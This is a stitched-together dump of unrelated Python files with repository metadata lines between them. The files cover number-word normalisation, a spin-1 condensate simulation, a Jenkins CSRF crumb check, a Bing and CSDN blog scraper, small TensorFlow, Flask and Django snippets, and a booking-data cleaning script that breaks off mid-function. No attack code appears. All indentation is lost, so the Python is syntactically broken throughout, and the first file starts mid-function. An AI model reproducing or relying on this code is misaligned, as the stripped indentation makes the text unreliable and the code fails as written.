if s[0] in ('-', '+'):
return s[1:].isdigit()
return s.isdigit()
def preprocess(sent, remove_pos=False, never_split=None):
"""
Preprocess the sentence by:
. remove commas from numbers (2,000 -> 2000)
. remove endings from ordinal numbers (2nd -> 2)
. convert "a {hundred,thousand...}" to "one {hundred,thousand,...}" so it can be handled by text2num function
. convert "digit digitword" (24 hundred) -> 2400
and return the sentence's preprocessed list of words that should be passed into text2num.
"""
if remove_pos:
words = [word[:word.rfind('_')] for word in sent.strip().split()]
else:
words = [word for word in sent.strip().split()]
tokenizer = BasicTokenizer(do_lower_case=True, never_split=never_split)
words = tokenizer.tokenize(sent)
# sent = ' '.join(tokens)
words_lower = [word.lower() for word in words]
# remove commas from numbers "2,000" -> 2000 and remove endings from ordinal numbers
for i in range(len(words)):
new_word = words_lower[i].replace(',', '')
if new_word.endswith(('th', 'rd', 'st', 'nd')):
new_word = new_word[:-2]
try:
if new_word not in ['infinity', 'inf', 'nan']:
int_word = float(new_word)
# words[i] = str(int_word)
words[i] = new_word
except ValueError:
pass # only modify this word if it's an int after preprocessing
Magnitude_with_hundred = Magnitude.copy()
Magnitude_with_hundred['hundred'] = 100
# convert "a {hundred,thousand,million,...}" to "one {hundred,thousand,million,...}"
for i in range(len(words)-1):
if words_lower[i] == 'a' and words_lower[i+1] in Magnitude_with_hundred:
words[i] = 'one'
# convert "24 {Magnitude}" -> 24000000000000 (mix of digits and words)
new_words = []
sigs = []
i = 0
while i < len(words)-1:
if check_int(words_lower[i]) and words_lower[i+1] in Magnitude_with_hundred:
new_words.append(str(float(words_lower[i]) * Magnitude_with_hundred[words_lower[i+1]]))
sigs.append(f'{words_lower[i]} {words_lower[i+1]}')
i += 1
else:
new_words.append(words[i])
sigs.append('')
if i == len(words) - 2:
new_words.append(words[i+1])
sigs.append('')
i += 1
return new_words, sigs
#
#
def normalize_numbers_in_sent(sent, remove_pos=False, never_split=None):
"""
Given a sentence, perform preprocessing and normalize number words to digits.
:param sent: sentence (str)
:return: a list of normalized words from the sentence
"""
out_words = []
words, sigfigs = preprocess(sent, remove_pos, never_split)
out_sigfigs = []
i = 0
while i < len(words):
for j in range(len(words), i, -1):
try:
number = str(text2num(words[i:j]))
if sigfigs[i] == '':
out_sigfigs.append(' '.join(words[i:j]))
else:
out_sigfigs.append(sigfigs[i])
out_words.append(number)
i = j-1 # skip this sequence since we replaced it with a number
break
except NumberException:
if j == i+1:
out_sigfigs.append('-1')
out_words.append(words[i])
i += 1
assert len(out_sigfigs) == len(out_words)
return out_words, out_sigfigs | 1.867188 | 2 |
dipole/splitting_dipole.py | wheelerMT/spin-1_BEC | 0 | 5538 | <gh_stars>0
import numpy as np
import multiprocessing as mp
import pyfftw
from numpy import pi, exp, sqrt, sin, cos, conj, arctan, tanh, tan
from numpy import heaviside as heav
from include import helper
import h5py
# ---------Spatial and potential parameters--------------
Mx = My = 64
Nx = Ny = 128 # Number of grid pts
dx = dy = 1 / 2 # Grid spacing
dkx = pi / (Mx * dx)
dky = pi / (My * dy) # K-space spacing
len_x = Nx * dx # Box length
len_y = Ny * dy
x = np.arange(-Mx, Mx) * dx
y = np.arange(-My, My) * dy
X, Y = np.meshgrid(x, y) # Spatial meshgrid
data = h5py.File('../data/splitting_dipole_data.hdf5', 'a')
data.create_dataset('grid/x', x.shape, data=x)
data.create_dataset('grid/y', y.shape, data=y)
kx = np.fft.fftshift(np.arange(-Mx, Mx) * dkx)
ky = np.fft.fftshift(np.arange(-My, My) * dky)
Kx, Ky = np.meshgrid(kx, ky) # K-space meshgrid
# Initialising FFTs
cpu_count = mp.cpu_count()
wfn_data = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
fft_forward = pyfftw.FFTW(wfn_data, wfn_data, axes=(0, 1), threads=cpu_count)
fft_backward = pyfftw.FFTW(wfn_data, wfn_data, direction='FFTW_BACKWARD', axes=(0, 1), threads=cpu_count)
# Framework for wavefunction data
psi_plus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_0_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_minus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
# Controlled variables
V = 0. # Doubly periodic box
p = q = 0.
c0 = 2
c1 = 0.5 # Effective 3-component BEC
k = 0 # Array index
# ------------------------------ Generating SQV's -------------------------
# Euler angles
alpha = 0.
beta = pi / 4
gamma = 0.
N_vort = 2 # Number of vortices
pos = [-10, 0, 10, 0]
theta_k = np.zeros((N_vort, Nx, Ny))  # accumulated with += below, so must start at zero
theta_tot = np.zeros((Nx, Ny))
for k in range(N_vort // 2):
# Scaling positional arguments
Y_minus = 2 * pi * (Y - pos[k]) / len_y
X_minus = 2 * pi * (X - pos[N_vort // 2 + k]) / len_x
Y_plus = 2 * pi * (Y - pos[N_vort + k]) / len_y
X_plus = 2 * pi * (X - pos[3 * N_vort // 2 + k]) / len_x
x_plus = 2 * pi * pos[3 * N_vort // 2 + k] / len_x
x_minus = 2 * pi * pos[N_vort // 2 + k] / len_x
for nn in np.arange(-5, 5):
theta_k[k, :, :] += arctan(
tanh((Y_minus + 2 * pi * nn) / 2) * tan((X_minus - pi) / 2)) \
- arctan(tanh((Y_plus + 2 * pi * nn) / 2) * tan((X_plus - pi) / 2)) \
+ pi * (heav(X_plus, 1.) - heav(X_minus, 1.))
theta_k[k, :, :] -= (2 * pi * Y / len_y) * (x_plus - x_minus) / (2 * pi)
theta_tot += theta_k[k, :, :]
# Initial wavefunction
Psi = np.empty((3, Nx, Ny), dtype='complex128')
Psi[0, :, :] = np.zeros((Nx, Ny)) + 0j
Psi[1, :, :] = np.ones((Nx, Ny), dtype='complex128') * exp(1j * theta_tot)
Psi[2, :, :] = np.zeros((Nx, Ny)) + 0j
psi_plus, psi_0, psi_minus = helper.rotation(Psi, Nx, Ny, alpha, beta, gamma) # Performs rotation to wavefunction
# Aligning wavefunction to potentially speed up FFTs
pyfftw.byte_align(psi_plus)
pyfftw.byte_align(psi_0)
pyfftw.byte_align(psi_minus)
# ------------------------------------------------------------------------
# Normalisation constants
N_plus = dx * dy * np.linalg.norm(psi_plus) ** 2
N_0 = dx * dy * np.linalg.norm(psi_0) ** 2
N_minus = dx * dy * np.linalg.norm(psi_minus) ** 2
# Time steps, number and wavefunction save variables
Nt = 80000
Nframe = 200
dt = 5e-3
t = 0.
# Saving time variables:
data.create_dataset('time/Nt', data=Nt)
data.create_dataset('time/dt', data=dt)
data.create_dataset('time/Nframe', data=Nframe)
# Setting up variables to be sequentially saved:
psi_plus_save = data.create_dataset('wavefunction/psi_plus', (Nx, Ny, Nt // Nframe), dtype='complex128')
psi_0_save = data.create_dataset('wavefunction/psi_0', (Nx, Ny, Nt // Nframe), dtype='complex128')
psi_minus_save = data.create_dataset('wavefunction/psi_minus', (Nx, Ny, Nt // Nframe), dtype='complex128')
for i in range(Nt):
# Spin vector terms:
F_perp = sqrt(2.) * (conj(psi_plus) * psi_0 + conj(psi_0) * psi_minus)
Fz = abs(psi_plus) ** 2 - abs(psi_minus) ** 2
F = sqrt(abs(Fz) ** 2 + abs(F_perp) ** 2) # Magnitude of spin vector
# Total density
n = abs(psi_minus) ** 2 + abs(psi_0) ** 2 + abs(psi_plus) ** 2
# Sin and cosine terms for solution
C = cos(c1 * F * (-1j * dt))
if F.min() == 0:
S = np.zeros((Nx, Ny), dtype='complex128') # Ensures no division by zero
else:
S = 1j * sin(c1 * F * (-1j * dt)) / F
# Forward FFTs
fft_forward(psi_plus, psi_plus_k)
fft_forward(psi_0, psi_0_k)
fft_forward(psi_minus, psi_minus_k)
# Computing kinetic energy + quadratic Zeeman
psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
# Inverse FFTs
fft_backward(psi_plus_k, psi_plus)
fft_backward(psi_0_k, psi_0)
fft_backward(psi_minus_k, psi_minus)
# Rescaling
psi_plus *= (Nx * Ny)
psi_0 *= (Nx * Ny)
psi_minus *= (Nx * Ny)
# Trap, linear Zeeman & interaction flow
psi_plus = ((C - S * Fz) * psi_plus - 1. / sqrt(2.) * S * conj(F_perp) * psi_0) * exp(-dt * (V - p + c0 * n))
psi_0 = (-1. / sqrt(2.) * S * F_perp * psi_plus + C * psi_0 - 1. / sqrt(2.) * S * conj(F_perp) * psi_minus) \
* exp(-dt * (V + c0 * n))
psi_minus = (-1. / sqrt(2.) * S * F_perp * psi_0 + (C + S * Fz) * psi_minus) * exp(-dt * (V + p + c0 * n))
# Forward FFTs
fft_forward(psi_plus, psi_plus_k)
fft_forward(psi_0, psi_0_k)
fft_forward(psi_minus, psi_minus_k)
# Computing kinetic energy + quadratic Zeeman
psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
# Inverse FFTs
fft_backward(psi_plus_k, psi_plus)
fft_backward(psi_0_k, psi_0)
fft_backward(psi_minus_k, psi_minus)
# Rescaling
psi_plus *= (Nx * Ny)
psi_0 *= (Nx * Ny)
psi_minus *= (Nx * Ny)
# Renormalizing wavefunction
psi_plus *= sqrt(N_plus) / sqrt(dx * dy * np.linalg.norm(psi_plus) ** 2)
psi_0 *= sqrt(N_0) / sqrt(dx * dy * np.linalg.norm(psi_0) ** 2)
psi_minus *= sqrt(N_minus) / sqrt(dx * dy * np.linalg.norm(psi_minus) ** 2)
# Prints current time and saves data to an array
if np.mod(i, Nframe) == 0:
print('it = %1.4f' % t)
psi_plus_save[:, :, k] = psi_plus[:, :]
psi_0_save[:, :, k] = psi_0[:, :]
psi_minus_save[:, :, k] = psi_minus[:, :]
k += 1
t += dt
data.close()
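def load_saved_frames(path='../data/splitting_dipole_data.hdf5'):
    # Hedged helper (addition, not in the original script): reload the frames
    # written above for post-processing; the dataset names mirror those created
    # with create_dataset earlier in this file.
    with h5py.File(path, 'r') as f:
        return (f['wavefunction/psi_plus'][...],
                f['wavefunction/psi_0'][...],
                f['wavefunction/psi_minus'][...])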
| 1.890625 | 2 |
src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | 4 | 5539 | from __future__ import print_function
import requests
import sys
import os
verbose=True
try:
username=os.environ['USERNAME']
    password=os.environ['PASSWORD']
except:
    print("Crumb Diagnostic requires USERNAME/PASSWORD to be set as environment variables")
sys.exit(-1)
jenkins_url=os.environ['JENKINS_URL']
url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)'
print(url)
if username:
crumb = requests.get(url, auth=(username, password))
if crumb.status_code == 200:
crumb_headers = dict()
crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1]
if verbose:
print("Got crumb: %s" % crumb.text)
else:
print("Failed to get crumb")
print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:")
print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm")
print(jenkins_url + "/configureSecurity")
sys.exit(-1)
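# Hedged follow-up sketch (not part of the original script): once obtained, the
# crumb header is normally attached to subsequent state-changing requests, e.g.
#   requests.post(jenkins_url + 'quietDown', auth=(username, password),
#                 headers=crumb_headers)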
| 2.515625 | 3 |
URI/1-Beginner/1099.py | vicenteneto/online-judge-solutions | 0 | 5540 | # -*- coding: utf-8 -*-
for i in range(int(raw_input())):
x, y = [int(x) for x in raw_input().split()]
if x > y:
x, y = y, x
x += 1 if x % 2 == 0 else 2
print sum([j for j in range(x, y, 2)])
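# Hedged Python 3 equivalent of the loop body above (the original targets Python 2):
#   x, y = sorted(map(int, input().split()))
#   start = x + 1 if x % 2 == 0 else x + 2
#   print(sum(range(start, y, 2)))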
| 3.453125 | 3 |
mock_file.py | MahirGulzar/fpointnet-tiny | 0 | 5541 | import tensorflow as tf
FLIPPING_TENSOR = tf.constant([1.0, -1.0, 1.0])
@tf.function
def sample_data(points, labels, num_point):
if tf.random.uniform(shape=()) >= 0.5:
return points * FLIPPING_TENSOR, labels
return points, labels
mock_data = tf.constant([
[1., 2., 3.],
[4., 5., 6.],
[7., 8., 9.]
])
mock_labels = tf.constant([
[1.], [0.], [1.]
])
sampling_lambda = lambda x, y: sample_data(x, y, 512)
train_data = tf.data.Dataset.from_tensors((mock_data, mock_labels)) \
.map(sampling_lambda) \
.unbatch() \
.batch(1) \
.repeat(5)
for x, y in train_data:
print(x) | 2.71875 | 3 |
myapp.py | dataholiks/flask_heroku_scheduler | 7 | 5542 | from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
return 'This is the app index page.'
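if __name__ == '__main__':
    # Hedged addition (not in the original snippet): run the development server
    # when invoked directly; on Heroku the app is typically started by a WSGI
    # server such as gunicorn instead.
    app.run()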
| 2.265625 | 2 |
day_ok/schedule/migrations/0027_auto_20210216_1337.py | bostud/day_ok | 0 | 5543 | # Generated by Django 3.1.6 on 2021-02-16 11:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('schedule', '0026_event'),
]
operations = [
migrations.AlterField(
model_name='group',
name='students',
            field=models.ManyToManyField(blank=True, to='schedule.Student', verbose_name='Students'),
),
migrations.AlterField(
model_name='teacher',
name='subjects',
            field=models.ManyToManyField(blank=True, to='schedule.Subject', verbose_name='Subjects'),
),
]
| 1.523438 | 2 |
Blog.py | OliverChao/PyWhoAmI | 0 | 5544 | <gh_stars>0
import aiohttp
import asyncio
import time
import time
import argparse
import glob
import os
import shutil
import random
import re
import requests
import sys
from concurrent import futures
import pdfkit
import time
from retrying import retry
from pygments import highlight
from pygments.lexers import guess_lexer, get_lexer_by_name
from pygments.lexers import CppLexer
from pygments.formatters.terminal import TerminalFormatter
from pygments.util import ClassNotFound
from pyquery import PyQuery as pq
from requests.exceptions import ConnectionError
from requests.exceptions import SSLError
import numbers
if sys.version < '3':
import codecs
from urllib import quote as url_quote
from urllib import getproxies
# Handling Unicode: http://stackoverflow.com/a/6633040/305414
def u(x):
return codecs.unicode_escape_decode(x)[0]
else:
from urllib.request import getproxies
from urllib.parse import quote as url_quote
def u(x):
return x
scripFilePath = os.path.split(os.path.realpath(__file__))[0]
PDF_DIR = os.path.join(scripFilePath,'whoamiPDFdir')
CPP_DIR = os.path.join(scripFilePath,'whoamiCPPdir')
class Result(object):
def __init__(self, host, args):
self.args = args
self.host = host
self._search_url = 'https://www.bing.com/search?q=site:{0}%20{1}'
self._USER_AGENTS = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:11.0) Gecko/20100101 Firefox/11.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100 101 Firefox/22.0',
# 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',
('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) '
'Chrome/19.0.1084.46 Safari/536.5'),
('Mozilla/5.0 (Windows; Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46'
'Safari/536.5'), )
self.data = self.whoami()
def __call__(self, *args, **kwargs):
return self.show_results()
def __len__(self):
return len(self.data)
def whoami(self):
self.args['query'] = ' '.join(self.args['query']).replace('?', '')
try:
return self.confirm_links() or 'Sorry, couldn\'t find any help with that topic\n'
except (ConnectionError, SSLError):
return 'Failed to establish network connection\n'
def confirm_links(self):
dic = self._get_dict(self.args['query'])
if not dic:
return False
        '''Skip link validation for now... testing multiple domains...'''
return dic
# def _is_article(link):
# return re.search('article/details/\d+', link)
# # question_links = [link for link in links if _is_article(link)]
# # https://blog.csdn.net/u013177568/article/details/62432761
# confirm_dict = {k: v for k, v in dic.items() if _is_article(v)}
# return confirm_dict
def _get_dict(self, query):
search_url = self._search_url.format(self.host, url_quote(query))
# search_url : site:blog.csdn.net 1173 HDU
result = self._get_result(search_url)
html = pq(result)
# return the anser_list
return self._extract_links(html, 'bing')
@retry(stop_max_attempt_number=3)
def _get_result(self, url):
try:
return requests.get(url, headers={'User-Agent': random.choice(self._USER_AGENTS)}, ).text
# verify = VERIFY_SSL_CERTIFICATE).text
except requests.exceptions.SSLError as e:
print('[ERROR] Encountered an SSL Error.\n')
print('[*]retrying again automatically ')
raise e
def _extract_links(self, html, search_engine):
if search_engine == 'bing':
return self._extract_dict_from_bing(html)
return None
@staticmethod
def _extract_dict_from_bing(html):
html.remove_namespaces()
dic = {}
for a in html('.b_algo')('h2')('a'):
# name ='[*{0}*] {1}'.format(str(num),a.text)
name = a.text
link = a.attrib['href']
dic[name] = str(link)
# num+=1
return dic
def show_results(self):
if isinstance(self.data,str):
print('[!!] ',self.data)
return
num = 0
for k, v in self.data.items():
print('[*{}*] '.format(str(num)), end='')
print(k, end=' [*link*] ')
print(v)
num += 1
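# Hedged usage sketch (assumption, reconstructed from the attribute accesses in
# this file; the real CLI builds args elsewhere):
#   args = {'query': ['1173', 'HDU'], 'print': 0, 'all_code': False,
#           'color': True, 'open_pdf': False, 'save': None, 'number_link': 0}
#   Blog('blog.csdn.net', args).show_results()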
class Blog(Result):
def __init__(self, host, args):
super().__init__(host, args)
self.links = list(self.data.values())
def show_code(self):
url = list(self.data.values())[self.args['print']]
main_page = self._parse_url(url)
s = self._get_code(main_page, self.args) or 'sorry,this article has no code...'
print(s)
def save_to_pdf(self, url):
html_template = u"""
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<!-- <center><h1>{title}</h1></center> -->
{content}
</body>
</html>
"""
options = {
'page-size': 'Letter',
'margin-top': '0.75in',
'margin-right': '0.75in',
'margin-bottom': '0.75in',
'margin-left': '0.75in',
'encoding': "UTF-8",
'custom-header': [
('Accept-Encoding', 'gzip')
],
'cookie': [
('cookie-name1', 'cookie-value1'),
('cookie-name2', 'cookie-value2'),
],
'outline-depth': 10,
}
main_page = self._parse_url(url)
title = main_page('h1').eq(0).text()
title = re.sub('[<>\?\\\/:\*\s\[\]\(\)\-]', '.', title)
html = html_template.format(title='Oliver loves Annabelle forever~', content=main_page.html())
if not os.path.exists(PDF_DIR):
os.makedirs(PDF_DIR)
filePath = os.path.join(PDF_DIR, title + '.pdf')
if self._test_is_open_if_exists(filePath):
return
try:
print('[*] save to ', filePath)
self._save_to_pdf(html,filePath)
print('[*] successfully ')
except:
            print('[!!] The page being saved may contain conflicting markup')
            print('[Note] Pages that embed html or similar markup are more likely to conflict')
            print('[!!] save failed')
            print('[!!] If the failure was caused by image paths, the text and code parts are still rendered to pdf')
try:
            # OS-level commands do not seem to be catchable by try here...
            self.open_after_save(filePath)
        except:
            print('[!!] The file was not opened; an IO error may have occurred while saving.')
            print('[!!] Please regenerate the pdf; alternatively, this page structure may not be suitable for pdf generation')
            print('[~~] Sorry about that...')
@staticmethod
def _save_to_pdf(html, filepath):
wkhtmltopdf_path = scripFilePath + '/wkhtmltox/bin/wkhtmltopdf.exe'
config = pdfkit.configuration(wkhtmltopdf=wkhtmltopdf_path)
pdfkit.from_string(html, filepath, configuration=config)
def open_after_save(self, pdf_path):
if not self.args['open_pdf']:
return
try:
if len(self.args['save']):
return False
except TypeError as e:
pass
# if args['pdf'] and PDFpath.split('.')[-1]!='pdf':
# PDFpath += '.pdf'
os.popen(pdf_path)
def _test_is_open_if_exists(self, file_path):
try:
if len(self.args['save']):
return False
except TypeError as e:
pass
if self.args['open_pdf']:
if os.path.exists(file_path):
                print('File already exists, opening it directly')
os.popen(file_path)
return True
else:
return False
def _parse_url(self, url):
'''
        :param url: page URL
        :return: PyQuery object for the main content area of the page
'''
page = self._get_result(url)
html = pq(page)
# the main part of the article
return html('.blog-content-box')
def _get_code(self, main_page, args):
'''
:param main_page:main_page=_parse_url(url)
:param args: args
:return: str
'''
html = main_page('article')('pre')('code') or main_page('article')('pre')
if not html:
return None
ans = []
ans_split = '\n' + '<==>' * 17 + '\n'
if args['all_code']:
for node in html:
node = pq(node)
s = node.html()
# s=re.sub('</?[^>]+>','',s)
s = re.sub('<((span)|(code)|(/span)|(/code)){1}.*?>', '', s)
s = s.replace('>', '>').replace('<', '<')
ans.append(self._add_color(s, args))
else:
node = pq(html[-1])
s = node.html()
s = re.sub('<((span)|(code)|(/span)|(/code)){1}.*?>', '', s)
s = s.replace('>', '>').replace('<', '<')
ans.append(self._add_color(s, args))
return ans_split.join(ans)
@staticmethod
def _add_color(code, args):
if not args['color']:
return code
lexer = None
try:
lexer = guess_lexer(code)
except ClassNotFound:
return code
return highlight(code, CppLexer(), TerminalFormatter(bg='dark'))
def save_to_cpp(self):
ans_split = '\n' + '<==>' * 17 + '\n'
url = self.links[self.args['number_link']]
main_page = self._parse_url(url)
title = main_page('h1').eq(0).text()
title = re.sub('[<>\?\\\/:\*\s]', '.', title)
s = self._get_code(main_page, self.args)
if not s:
print('sorry , this article has no code...')
print('please try another...')
return
if not os.path.exists(CPP_DIR):
os.makedirs(CPP_DIR)
filePath = os.path.join(CPP_DIR, title + '.cpp')
if self._test_is_open_if_exists(filePath):
return
code = s.split(ans_split)[-1]
with open(filePath, 'w')as f:
f.write(code)
print('[*]save successfully...')
try:
self.open_after_save(filePath)
except:
            print('[!!] The file was not opened; an IO error may have occurred while saving.')
print('[!!]open failed') | 2.125 | 2 |
corehq/apps/app_manager/tests/test_xml_parsing.py | dslowikowski/commcare-hq | 1 | 5545 | from django.test import SimpleTestCase as TestCase
from corehq.apps.app_manager.models import _parse_xml
import os
class XMLParsingTest(TestCase):
def testUnicodeError(self):
"""Tests a bug found in Unicode processing of a form"""
file_path = os.path.join(os.path.dirname(__file__), "data", "unicode_error_form.xhtml")
with open(file_path, "rb") as f:
xml_data = f.read()
try:
_parse_xml(xml_data) # this should not raise an error
except:
self.fail("Parsing normal string data shouldn't fail!")
try:
_parse_xml(unicode(xml_data))
except:
self.fail("Parsing unicode data shouldn't fail!")
| 2.75 | 3 |
dynamic_programming/01/01-06.py | fumiyanll23/algo-method | 0 | 5546 | # input
N, M = map(int, input().split())
Ds = [*map(int, input().split())]
# compute
dp = [False] * (N+1)
for ni in range(N+1):
if ni == 0:
dp[ni] = True
for D in Ds:
if ni >= D:
dp[ni] = dp[ni] or dp[ni-D]
# output
print("Yes" if dp[-1] else "No")
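# Hedged worked example (not part of the original solution): for N=11 and
# Ds=[3, 5], dp[11] becomes True via 3+3+5, so "Yes" is printed; for N=7 and
# the same Ds no combination works and "No" is printed.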
| 2.875 | 3 |
swapsort.py | ArshSood/sorting | 0 | 5547 | # sorting
n=int(input())
array=list(map(int,input().split()))
i=0
count=[]
counter=0
while i<len(array):
min=i
start=i+1
while(start<len(array)):
if array[start]<array[min]:
min=start
start+=1
if i!=min:
array[i],array[min]=array[min],array[i]
count.append(i)
count.append(min)
counter+=1
i+=1
print(counter)
for i in range(0,len(count)):
print(count[i],end=" ")
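# Hedged I/O illustration (not in the original): for input "3" and "3 1 2" the
# selection sort above performs swaps (0,1) then (1,2), so it prints "2"
# followed by "0 1 1 2".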
| 3.3125 | 3 |
tests/news_test.py | mucciz/News | 0 | 5548 | import unittest
from app.models import News
# News = news.News
class NewsTest(unittest.TestCase):
'''
    Test Class to test the behaviour of the News class
'''
def setUp(self):
'''
Set up method that will run before every Test
'''
self.new_news = News('abc-news','ABC NEWS','Your trusted source for breaking news, analysis, exclusive interviews, headlines, and videos at ABCNews.com.','http://www.abc.net.au/news','business','au')
def test_instance(self):
self.assertTrue(isinstance(self.new_news,News))
def test_init(self):
self.assertEqual(self.new_news.id,'abc-news')
self.assertEqual(self.new_news.name,'ABC NEWS')
self.assertEqual(self.new_news.description,'Your trusted source for breaking news, analysis, exclusive interviews, headlines, and videos at ABCNews.com.')
self.assertEqual(self.new_news.url,'http://www.abc.net.au/news')
self.assertEqual(self.new_news.country,'au')
# if __name__ == '__main__':
# unittest.main()
| 3.75 | 4 |
test/get-gh-comment-info.py | MQasimSarfraz/cilium | 1 | 5549 | <gh_stars>1-10
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('ghcomment', type=str) # this is for test-me-please phrases
parser.add_argument('--focus', type=str, default="")
parser.add_argument('--version', type=str, default="")
parser.add_argument('--retrieve', type=str, default="focus")
args = parser.parse_args()
print args.__dict__[args.retrieve]
| 2.5625 | 3 |
preprocessing/booking.py | madcat1991/clustered_cars | 0 | 5550 | <gh_stars>0
"""
This script cleans and prepares the data set of bookings for future use
"""
import argparse
import logging
import sys
import pandas as pd
from preprocessing.common import canonize_datetime, raw_data_to_df, check_processed_columns, check_data
OLD_BREAKPOINT_MATCHER = {
2001: [
(1, 1, "New Year"), (1, 6, "Winter"),
(2, 17, "Half Terms"), (2, 24, "Spring and Autumn"),
(4, 7, "Easter"), (4, 21, "Spring and Autumn"),
(5, 26, "SBH"),
(6, 2, "Early Summer"),
(7, 21, "Summer holidays"),
(9, 1, "Early Autumn"), (9, 15, "Spring and Autumn"),
(10, 27, "Half Terms"),
(11, 3, "Winter"),
(12, 22, "Christmas"), (12, 29, "New Year"),
],
2002: [
(1, 1, "New Year"), (1, 5, "Winter"),
(2, 16, "Half Terms"), (2, 23, "Spring and Autumn"),
(4, 6, "Easter"), (4, 20, "Spring and Autumn"),
(5, 25, "SBH"),
(6, 1, "Early Summer"),
(7, 20, "Summer holidays"),
(8, 31, "Early Autumn"),
(9, 14, "Spring and Autumn"),
(10, 26, "Half Terms"),
(11, 2, "Winter"),
(12, 21, "Christmas"), (12, 28, "New Year"),
],
2003: [
(1, 1, "New Year"), (1, 4, "Winter"),
(2, 15, "Half Terms"), (2, 22, "Spring and Autumn"),
(4, 5, "Easter"), (4, 19, "Spring and Autumn"),
(5, 24, "SBH"), (5, 31, "Early Summer"),
(7, 19, "Summer holidays"),
(8, 30, "Early Autumn"),
(9, 13, "Spring and Autumn"),
(10, 25, "Half Terms"),
(11, 1, "Winter"),
(12, 20, "Christmas"), (12, 27, "New Year"),
],
2004: [
(1, 1, "New Year"), (1, 3, "Winter"),
(2, 14, "Half Terms"), (2, 21, "Spring and Autumn"),
(4, 3, "Easter"), (4, 17, "Spring and Autumn"),
(5, 22, "SBH"), (5, 29, "Early Summer"),
(7, 17, "Summer holidays"),
(8, 28, "Early Autumn"),
(9, 11, "Spring and Autumn"),
(10, 23, "Half Terms"), (10, 30, "Winter"),
(12, 18, "Christmas"),
],
2005: [
(1, 1, "Winter"),
(2, 12, "Half Terms"), (2, 19, "Spring and Autumn"),
(4, 2, "Easter"), (4, 16, "Spring and Autumn"),
(5, 21, "SBH"), (5, 28, "Early Summer"),
(7, 16, "Summer holidays"),
(8, 27, "Early Autumn"),
(9, 10, "Spring and Autumn"),
(10, 22, "Half Terms"), (10, 29, "Winter"),
(12, 17, "Christmas"), (12, 31, "New Year"),
],
2006: [
(1, 1, "New Year"), (1, 7, "Winter"),
(2, 18, "Half Terms"), (2, 25, "Spring and Autumn"),
(4, 8, "Easter"), (4, 22, "Spring and Autumn"),
(5, 27, "SBH"),
(6, 3, "Early Summer"),
(7, 22, "Summer holidays"),
(9, 2, "Early Autumn"), (9, 16, "Spring and Autumn"),
(10, 28, "Half Terms"),
(11, 4, "Winter"),
(12, 23, "Christmas"), (12, 30, "New Year"),
],
2007: [
(1, 1, "New Year"), (1, 6, "Winter"),
(2, 17, "Half Terms"), (2, 24, "Spring and Autumn"),
(4, 7, "Easter"),
(4, 21, "Spring and Autumn"),
(5, 26, "SBH"),
(6, 2, "Early Summer"),
(7, 21, "Summer holidays"),
(9, 1, "Early Autumn"), (9, 15, "Spring and Autumn"),
(10, 27, "Half Terms"),
(11, 3, "Winter"),
(12, 22, "Christmas"), (12, 29, "New Year"),
],
2008: [
(1, 1, "New Year"), (1, 5, "Winter"),
(2, 16, "Half Terms"), (2, 23, "Spring and Autumn"),
(3, 22, "Easter"),
(4, 19, "Spring and Autumn"),
(5, 24, "SBH"), (5, 31, "Early Summer"),
(7, 19, "Summer holidays"),
(8, 30, "Early Autumn"),
(9, 13, "Spring and Autumn"),
(10, 25, "Half Terms"),
(11, 1, "Winter"),
(12, 20, "Christmas"),
],
}
COLS_TO_DROP = [
'pname', 'region', 'sleeps', 'stars', 'proppostcode', # can be taken from property
'bookdate_scoreboard', 'book_year', 'hh_gross', 'hh_net', 'ho', # HH specific
'holidayprice', # correlates with avg_spend_per_head
'bighouse', 'burghisland', 'boveycastle', # no need
'sourcecostid', # is a pair of u'sourcedesc', u'category'
'drivedistance', # correlates with drivetime
]
NOT_NA_COLS = [u'bookcode', u'code', u'propcode', u'year', u'breakpoint', u'avg_spend_per_head']
DATE_COLS = [u'bookdate', u'sdate', u"fdate"]
FLOAT_COLS = [u'avg_spend_per_head', u'drivetime']
INT_COLS = [u'adults', u'babies', u'children', u'pets']
CATEGORICAL_COLS = [u'sourcedesc', u'category']
def get_breakpoint(dt):
breakpoint = None
matcher = OLD_BREAKPOINT_MATCHER.get(dt.year, [])
for _m, _d, _b in matcher:
if _m > dt.month or (_m == dt.month and _d > dt.day):
break
breakpoint = _b
return breakpoint
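# Hedged illustration (not in the original): get_breakpoint picks the last
# season whose start date is on or before the given date, e.g. 20 July 2005
# falls into "Summer holidays", while any year missing from
# OLD_BREAKPOINT_MATCHER yields None.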
def fine_tune_df(df):
logging.info(u"DF shape before fine tuning: %s", df.shape)
averages = {col: df[col].dropna().mean() for col in FLOAT_COLS}
zeros = {col: 0 for col in INT_COLS}
